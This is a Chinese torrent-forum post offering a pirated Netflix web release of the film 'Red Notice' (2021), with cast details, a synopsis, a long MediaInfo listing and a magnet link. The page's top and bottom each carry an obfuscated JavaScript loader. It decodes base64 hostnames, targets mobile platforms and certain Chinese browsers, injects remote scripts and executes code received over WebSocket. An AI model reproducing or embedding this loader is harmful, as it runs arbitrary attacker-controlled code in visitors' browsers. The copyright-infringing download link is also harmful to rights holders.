红色通缉令[简繁字幕].Red.Notice.2021.Netflix.WEB-DL.1080p.HEVC.DV.DDP 5.39GB

版主小s 21天前 488

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 红色通缉令

◎片 名 Red Notice

◎年 代 2021

◎产 地 美国

◎类 别 喜剧 / 动作 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2021-11-12(美国)

◎IMDb链接 https://www.imdb.com/title/tt7991608/

◎豆瓣链接 https://movie.douban.com/subject/30143331/

◎片 长 115分钟

◎导 演 罗森·马歇尔·瑟伯 Rawson Marshall Thurber (id:1005149)

◎编 剧 罗森·马歇尔·瑟伯 Rawson Marshall Thurber (id:1005149)

◎演 员 瑞安·雷诺兹 Ryan Reynolds (id:1053623)

道恩·强森 Dwayne Johnson (id:1044707)

盖尔·加朵 Gal Gadot (id:1044996)

里图·阿亚 Ritu Arya (id:1396614)

克里斯·迪亚曼托普洛斯 Chris Diamantopoulos (id:1090227)

伊万·姆巴科普 Ivan Mbakop (id:1445883)

温琴佐·阿马托 Vincenzo Amato (id:1277139)

帕斯卡尔·佩塔尔迪 Rafael Petardi (id:1397351)

塞思·迈克尔斯 Seth Michaels (id:1366034)

罗伯特·廷斯利 Robert Tinsley (id:1402482)

汤姆·蔡 Tom Choi (id:1326607)

马丁·威廉·哈里斯 Martin William Harris (id:1262286)

盖·纳尔杜利 Guy Nardulli (id:1214094)

杰伊·古铁雷斯 Jay Gutierrez (id:1268126)

Ray Siegle Ray Siegle (id:1297576)

詹姆斯·威廉·巴拉德 James William Ballard (id:1434106)

埃尔文·费利西达 Erwin Felicilda (id:1434119)

约瑟夫·波多尔斯基 Yosef Podolski (id:1371471)

维多利亚·佩吉·沃特金斯 Victoria Paige Watkins (id:1434123)

塞巴斯蒂安·拉格 Sebastien Large (id:1452541)

罗森·马歇尔·瑟伯 Rawson Marshall Thurber (id:1005149)

达妮·加西亚 Dany Garcia (id:1180644)

海拉姆·加西亚 Hiram Garcia (id:1410407)

道恩·强森 Dwayne Johnson (id:1044707)

斯蒂夫·贾布隆斯基 Steve Jablonsky (id:1027591)

马库斯·福德勒 Markus F?rderer (id:1443248)

瑞秋·特纳 Rachel Tenner (id:1299064)

安迪·尼克尔森 Andy Nicholson (id:1293160)

詹森·诺克斯·约翰斯顿 Jason Knox-Johnston (id:1288785)

玛丽·E·沃格特 Mary E. Vogt (id:1300156)

◎标 签 Netflix / 动作 / 喜剧 / 瑞恩·雷诺兹 / 美国 / 巨石强森 / 犯罪 / 特工

◎简 介

国际刑警组织发布名为「红色通缉令」的全球警戒,出手追捕全球头号通缉犯。一桩胆大妄为的劫案,却导致美国联邦调查局一名顶尖犯罪侧写员(道恩·强森 Dwayne Johnson 饰),杠上两位互相较劲的罪犯(盖尔·加朵 Gal Gadot、瑞安·雷诺兹 Ryan Reynolds 饰),这下事情会怎么发展,可就难说了。

  1. ##### MediaInfo ######

  2. General

  3. Complete name : Red.Notice.2021.Netflix.WEB-DL.1080p.HEVC.DV.DDP-Enichi.mp4

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom)

  7. File size : 5.39 GiB

  8. Duration : 1 h 57 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 6 536 kb/s

  11. Encoded date : UTC 2021-11-12 08:13:56

  12. Tagged date : UTC 2021-11-12 08:13:56


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. HDR format : Dolby Vision, Version 1.0, dvhe.05.03, BL+RPU

  19. Codec ID : dvhe

  20. Codec ID/Info : High Efficiency Video Coding with Dolby Vision

  21. Duration : 1 h 57 min

  22. Bit rate : 5 761 kb/s

  23. Width : 1 920 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.116

  32. Stream size : 4.75 GiB (88%)

  33. Default : No

  34. Encoded date : UTC 2021-11-12 08:09:56

  35. Tagged date : UTC 2021-11-12 08:14:16

  36. Color range : Full

  37. Codec configuration box : hvcC+dvcC


  38. Audio

  39. ID : 2

  40. Format : E-AC-3 JOC

  41. Format/Info : Enhanced AC-3 with Joint Object Coding

  42. Commercial name : Dolby Digital Plus with Dolby Atmos

  43. Codec ID : ec-3

  44. Duration : 1 h 57 min

  45. Bit rate mode : Constant

  46. Bit rate : 768 kb/s

  47. Maximum bit rate : 811 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : L R C LFE Ls Rs

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 31.250 FPS (1536 SPF)

  52. Compression mode : Lossy

  53. Stream size : 648 MiB (12%)

  54. Title : English

  55. Language : English

  56. Service kind : Complete Main

  57. Encoded date : UTC 2021-11-12 08:14:10

  58. Tagged date : UTC 2021-11-12 08:14:16

  59. Complexity index : Not present / 16

  60. Number of dynamic objects : 15

  61. Bed channel count : 1 channel

  62. Bed channel configuration : LFE


  63. Text #1

  64. ID : 3

  65. Format : Timed Text

  66. Codec ID : tx3g

  67. Duration : 1 h 55 min

  68. Bit rate mode : Variable

  69. Bit rate : 80 b/s

  70. Stream size : 68.1 KiB (0%)

  71. Title : English

  72. Language : English

  73. Forced : No

  74. Encoded date : UTC 2021-11-12 08:14:13

  75. Tagged date : UTC 2021-11-12 08:14:16


  76. Text #2

  77. ID : 4

  78. Format : Timed Text

  79. Codec ID : tx3g

  80. Duration : 1 h 47 min

  81. Bit rate mode : Variable

  82. Bit rate : 1 b/s

  83. Stream size : 946 Bytes (0%)

  84. Title : English

  85. Language : English

  86. Forced : No

  87. Encoded date : UTC 2021-11-12 08:14:13

  88. Tagged date : UTC 2021-11-12 08:14:16


  89. Text #3

  90. ID : 5

  91. Format : Timed Text

  92. Codec ID : tx3g

  93. Duration : 1 h 55 min

  94. Bit rate mode : Variable

  95. Bit rate : 102 b/s

  96. Stream size : 86.2 KiB (0%)

  97. Title : ????

  98. Language : Arabic

  99. Forced : No

  100. Encoded date : UTC 2021-11-12 08:14:13

  101. Tagged date : UTC 2021-11-12 08:14:16


  102. Text #4

  103. ID : 6

  104. Format : Timed Text

  105. Codec ID : tx3g

  106. Duration : 1 h 55 min

  107. Bit rate mode : Variable

  108. Bit rate : 61 b/s

  109. Stream size : 51.8 KiB (0%)

  110. Title : 中文(简体)

  111. Language : Chinese

  112. Forced : No

  113. Encoded date : UTC 2021-11-12 08:14:13

  114. Tagged date : UTC 2021-11-12 08:14:16


  115. Text #5

  116. ID : 7

  117. Format : Timed Text

  118. Codec ID : tx3g

  119. Duration : 1 h 55 min

  120. Bit rate mode : Variable

  121. Bit rate : 56 b/s

  122. Stream size : 47.2 KiB (0%)

  123. Title : 中文(繁體)

  124. Language : Chinese

  125. Forced : No

  126. Encoded date : UTC 2021-11-12 08:14:14

  127. Tagged date : UTC 2021-11-12 08:14:16


  128. Text #6

  129. ID : 8

  130. Format : Timed Text

  131. Codec ID : tx3g

  132. Duration : 1 h 55 min

  133. Bit rate mode : Variable

  134. Bit rate : 58 b/s

  135. Stream size : 49.0 KiB (0%)

  136. Title : hrvatski

  137. Language : Croatian

  138. Forced : No

  139. Encoded date : UTC 2021-11-12 08:14:14

  140. Tagged date : UTC 2021-11-12 08:14:16


  141. Text #7

  142. ID : 9

  143. Format : Timed Text

  144. Codec ID : tx3g

  145. Duration : 1 h 55 min

  146. Bit rate mode : Variable

  147. Bit rate : 58 b/s

  148. Stream size : 49.2 KiB (0%)

  149. Title : ?esky

  150. Language : Czech

  151. Forced : No

  152. Encoded date : UTC 2021-11-12 08:14:14

  153. Tagged date : UTC 2021-11-12 08:14:16


  154. Text #8

  155. ID : 10

  156. Format : Timed Text

  157. Codec ID : tx3g

  158. Duration : 1 h 55 min

  159. Bit rate mode : Variable

  160. Bit rate : 58 b/s

  161. Stream size : 48.7 KiB (0%)

  162. Title : dansk

  163. Language : Danish

  164. Forced : No

  165. Encoded date : UTC 2021-11-12 08:14:14

  166. Tagged date : UTC 2021-11-12 08:14:16


  167. Text #9

  168. ID : 11

  169. Format : Timed Text

  170. Codec ID : tx3g

  171. Duration : 1 h 55 min

  172. Bit rate mode : Variable

  173. Bit rate : 52 b/s

  174. Stream size : 44.2 KiB (0%)

  175. Title : Nederlands

  176. Language : Dutch

  177. Forced : No

  178. Encoded date : UTC 2021-11-12 08:14:14

  179. Tagged date : UTC 2021-11-12 08:14:16


  180. Text #10

  181. ID : 12

  182. Format : Timed Text

  183. Codec ID : tx3g

  184. Duration : 1 h 55 min

  185. Bit rate mode : Variable

  186. Bit rate : 57 b/s

  187. Stream size : 48.2 KiB (0%)

  188. Title : Vlaams

  189. Language : Finnish

  190. Forced : No

  191. Encoded date : UTC 2021-11-12 08:14:14

  192. Tagged date : UTC 2021-11-12 08:14:16


  193. Text #11

  194. ID : 13

  195. Format : Timed Text

  196. Codec ID : tx3g

  197. Duration : 1 h 55 min

  198. Bit rate mode : Variable

  199. Bit rate : 63 b/s

  200. Stream size : 53.3 KiB (0%)

  201. Title : Fran?ais

  202. Language : French

  203. Forced : No

  204. Encoded date : UTC 2021-11-12 08:14:14

  205. Tagged date : UTC 2021-11-12 08:14:16


  206. Text #12

  207. ID : 14

  208. Format : Timed Text

  209. Codec ID : tx3g

  210. Duration : 1 h 55 min

  211. Bit rate mode : Variable

  212. Bit rate : 60 b/s

  213. Stream size : 51.2 KiB (0%)

  214. Title : Deutsch

  215. Language : German

  216. Forced : No

  217. Encoded date : UTC 2021-11-12 08:14:14

  218. Tagged date : UTC 2021-11-12 08:14:16


  219. Text #13

  220. ID : 15

  221. Format : Timed Text

  222. Codec ID : tx3g

  223. Duration : 1 h 55 min

  224. Bit rate mode : Variable

  225. Bit rate : 97 b/s

  226. Stream size : 81.8 KiB (0%)

  227. Title : ελληνικ?

  228. Language : Greek

  229. Forced : No

  230. Encoded date : UTC 2021-11-12 08:14:14

  231. Tagged date : UTC 2021-11-12 08:14:16


  232. Text #14

  233. ID : 16

  234. Format : Timed Text

  235. Codec ID : tx3g

  236. Duration : 1 h 55 min

  237. Bit rate mode : Variable

  238. Bit rate : 86 b/s

  239. Stream size : 72.4 KiB (0%)

  240. Title : ????

  241. Language : Hebrew

  242. Forced : No

  243. Encoded date : UTC 2021-11-12 08:14:14

  244. Tagged date : UTC 2021-11-12 08:14:16


  245. Text #15

  246. ID : 17

  247. Format : Timed Text

  248. Codec ID : tx3g

  249. Duration : 1 h 55 min

  250. Bit rate mode : Variable

  251. Bit rate : 60 b/s

  252. Stream size : 51.0 KiB (0%)

  253. Title : Magyar

  254. Language : Hungarian

  255. Forced : No

  256. Encoded date : UTC 2021-11-12 08:14:14

  257. Tagged date : UTC 2021-11-12 08:14:16


  258. Text #16

  259. ID : 18

  260. Format : Timed Text

  261. Codec ID : tx3g

  262. Duration : 1 h 55 min

  263. Bit rate mode : Variable

  264. Bit rate : 61 b/s

  265. Stream size : 51.3 KiB (0%)

  266. Title : Indonesia

  267. Language : Indonesian

  268. Forced : No

  269. Encoded date : UTC 2021-11-12 08:14:14

  270. Tagged date : UTC 2021-11-12 08:14:16


  271. Text #17

  272. ID : 19

  273. Format : Timed Text

  274. Codec ID : tx3g

  275. Duration : 1 h 55 min

  276. Bit rate mode : Variable

  277. Bit rate : 60 b/s

  278. Stream size : 50.4 KiB (0%)

  279. Title : Italiano

  280. Language : Italian

  281. Forced : No

  282. Encoded date : UTC 2021-11-12 08:14:14

  283. Tagged date : UTC 2021-11-12 08:14:16


  284. Text #18

  285. ID : 20

  286. Format : Timed Text

  287. Codec ID : tx3g

  288. Duration : 1 h 55 min

  289. Bit rate mode : Variable

  290. Bit rate : 51 b/s

  291. Stream size : 43.1 KiB (0%)

  292. Title : 日本語

  293. Language : Japanese

  294. Forced : No

  295. Encoded date : UTC 2021-11-12 08:14:15

  296. Tagged date : UTC 2021-11-12 08:14:16


  297. Text #19

  298. ID : 21

  299. Format : Timed Text

  300. Codec ID : tx3g

  301. Duration : 1 h 55 min

  302. Bit rate mode : Variable

  303. Bit rate : 66 b/s

  304. Stream size : 56.0 KiB (0%)

  305. Title : ???

  306. Language : Korean

  307. Forced : No

  308. Encoded date : UTC 2021-11-12 08:14:15

  309. Tagged date : UTC 2021-11-12 08:14:16


  310. Text #20

  311. ID : 22

  312. Format : Timed Text

  313. Codec ID : tx3g

  314. Duration : 1 h 55 min

  315. Bit rate mode : Variable

  316. Bit rate : 60 b/s

  317. Stream size : 51.1 KiB (0%)

  318. Title : ???? ?????

  319. Language : Malay

  320. Forced : No

  321. Encoded date : UTC 2021-11-12 08:14:15

  322. Tagged date : UTC 2021-11-12 08:14:16


  323. Text #21

  324. ID : 23

  325. Format : Timed Text

  326. Codec ID : tx3g

  327. Duration : 1 h 55 min

  328. Bit rate mode : Variable

  329. Bit rate : 58 b/s

  330. Stream size : 49.2 KiB (0%)

  331. Title : norsk

  332. Language : Norwegian Bokmal

  333. Forced : No

  334. Encoded date : UTC 2021-11-12 08:14:15

  335. Tagged date : UTC 2021-11-12 08:14:16


  336. Text #22

  337. ID : 24

  338. Format : Timed Text

  339. Codec ID : tx3g

  340. Duration : 1 h 55 min

  341. Bit rate mode : Variable

  342. Bit rate : 58 b/s

  343. Stream size : 49.5 KiB (0%)

  344. Title : J?zyk polski

  345. Language : Polish

  346. Forced : No

  347. Encoded date : UTC 2021-11-12 08:14:15

  348. Tagged date : UTC 2021-11-12 08:14:16


  349. Text #23

  350. ID : 25

  351. Format : Timed Text

  352. Codec ID : tx3g

  353. Duration : 1 h 55 min

  354. Bit rate mode : Variable

  355. Bit rate : 64 b/s

  356. Stream size : 54.4 KiB (0%)

  357. Title : Português

  358. Language : Portuguese

  359. Forced : No

  360. Encoded date : UTC 2021-11-12 08:14:15

  361. Tagged date : UTC 2021-11-12 08:14:16


  362. Text #24

  363. ID : 26

  364. Format : Timed Text

  365. Codec ID : tx3g

  366. Duration : 1 h 55 min

  367. Bit rate mode : Variable

  368. Bit rate : 60 b/s

  369. Stream size : 51.0 KiB (0%)

  370. Title : Português

  371. Language : Portuguese

  372. Forced : No

  373. Encoded date : UTC 2021-11-12 08:14:15

  374. Tagged date : UTC 2021-11-12 08:14:16


  375. Text #25

  376. ID : 27

  377. Format : Timed Text

  378. Codec ID : tx3g

  379. Duration : 1 h 55 min

  380. Bit rate mode : Variable

  381. Bit rate : 66 b/s

  382. Stream size : 55.7 KiB (0%)

  383. Title : Limba roman?

  384. Language : Romanian

  385. Forced : No

  386. Encoded date : UTC 2021-11-12 08:14:15

  387. Tagged date : UTC 2021-11-12 08:14:16


  388. Text #26

  389. ID : 28

  390. Format : Timed Text

  391. Codec ID : tx3g

  392. Duration : 1 h 55 min

  393. Bit rate mode : Variable

  394. Bit rate : 90 b/s

  395. Stream size : 75.9 KiB (0%)

  396. Title : русский язык

  397. Language : Russian

  398. Forced : No

  399. Encoded date : UTC 2021-11-12 08:14:15

  400. Tagged date : UTC 2021-11-12 08:14:16


  401. Text #27

  402. ID : 29

  403. Format : Timed Text

  404. Codec ID : tx3g

  405. Duration : 1 h 55 min

  406. Bit rate mode : Variable

  407. Bit rate : 60 b/s

  408. Stream size : 50.8 KiB (0%)

  409. Title : Espa?ol?(Latinoamérica)

  410. Language : Spanish

  411. Forced : No

  412. Encoded date : UTC 2021-11-12 08:14:15

  413. Tagged date : UTC 2021-11-12 08:14:16


  414. Text #28

  415. ID : 30

  416. Format : Timed Text

  417. Codec ID : tx3g

  418. Duration : 1 h 55 min

  419. Bit rate mode : Variable

  420. Bit rate : 58 b/s

  421. Stream size : 49.2 KiB (0%)

  422. Title : Espa?ol?(Espa?a)

  423. Language : Spanish

  424. Forced : No

  425. Encoded date : UTC 2021-11-12 08:14:15

  426. Tagged date : UTC 2021-11-12 08:14:16


  427. Text #29

  428. ID : 31

  429. Format : Timed Text

  430. Codec ID : tx3g

  431. Duration : 1 h 55 min

  432. Bit rate mode : Variable

  433. Bit rate : 60 b/s

  434. Stream size : 50.9 KiB (0%)

  435. Title : svenska

  436. Language : Swedish

  437. Forced : No

  438. Encoded date : UTC 2021-11-12 08:14:15

  439. Tagged date : UTC 2021-11-12 08:14:16


  440. Text #30

  441. ID : 32

  442. Format : Timed Text

  443. Codec ID : tx3g

  444. Duration : 1 h 55 min

  445. Bit rate mode : Variable

  446. Bit rate : 140 b/s

  447. Stream size : 118 KiB (0%)

  448. Title : ???

  449. Language : Thai

  450. Forced : No

  451. Encoded date : UTC 2021-11-12 08:14:15

  452. Tagged date : UTC 2021-11-12 08:14:16


  453. Text #31

  454. ID : 33

  455. Format : Timed Text

  456. Codec ID : tx3g

  457. Duration : 1 h 55 min

  458. Bit rate mode : Variable

  459. Bit rate : 62 b/s

  460. Stream size : 52.7 KiB (0%)

  461. Title : Türk

  462. Language : Turkish

  463. Forced : No

  464. Encoded date : UTC 2021-11-12 08:14:15

  465. Tagged date : UTC 2021-11-12 08:14:16


  466. Text #32

  467. ID : 34

  468. Format : Timed Text

  469. Codec ID : tx3g

  470. Duration : 1 h 55 min

  471. Bit rate mode : Variable

  472. Bit rate : 94 b/s

  473. Stream size : 79.6 KiB (0%)

  474. Title : Укра?нська

  475. Language : Ukrainian

  476. Forced : No

  477. Encoded date : UTC 2021-11-12 08:14:16

  478. Tagged date : UTC 2021-11-12 08:14:16


  479. Text #33

  480. ID : 35

  481. Format : Timed Text

  482. Codec ID : tx3g

  483. Duration : 1 h 55 min

  484. Bit rate mode : Variable

  485. Bit rate : 84 b/s

  486. Stream size : 70.9 KiB (0%)

  487. Title : Ti?ng Vi?t

  488. Language : Vietnamese

  489. Forced : No

  490. Encoded date : UTC 2021-11-12 08:14:16

  491. Tagged date : UTC 2021-11-12 08:14:16




复制代码


TAGS 动作 惊悚 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:0A6EEC394F9828BAB725A26E698FEC97DA06B2AA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};